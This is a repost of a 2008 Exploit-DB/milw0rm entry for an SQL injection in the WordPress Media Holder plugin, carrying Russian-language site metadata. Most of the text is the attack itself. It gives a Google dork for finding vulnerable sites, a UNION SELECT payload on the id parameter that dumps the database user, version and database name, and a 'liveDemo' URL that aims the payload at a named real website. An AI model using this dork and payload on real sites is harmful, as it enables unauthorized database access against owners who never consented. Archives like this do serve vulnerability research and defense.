- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6842
- Проверка EDB
-
- Пройдено
- Автор
- BOOM3RANG
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2008-10-26
Код:
-------------------------------------------------------------------
WordPress Media Holder (id) Sql injetion vulnerability!
-------------------------------------------------------------------
-------------------------------------------------------------------
Author: boom3rang
Greetz: H!tM@N - KHG - chs - redc00de!
Site : www.khg-crew.ws - [Kosova Hackers Group!]
-------------------------------------------------------------------
-------------------------------------------------------------------
Dork: mediaHolder.php?id
-------------------------------------------------------------------
Exp: http://localHost/mediaHolder.php?id=[exploit]
-------------------------------------------------------------------
exploit: -9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--
-------------------------------------------------------------------
liveDemo:
http://www.dhadm.com/mediaHolder.php?id=-9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--
-------------------------------------------------------------------
-------------------------------------------------------------------
Proud 2 be Albanian
Proud 2 be Muslim
United States of Albania
-------------------------------------------------------------------
# milw0rm.com [2008-10-26]
- Источник
- www.exploit-db.com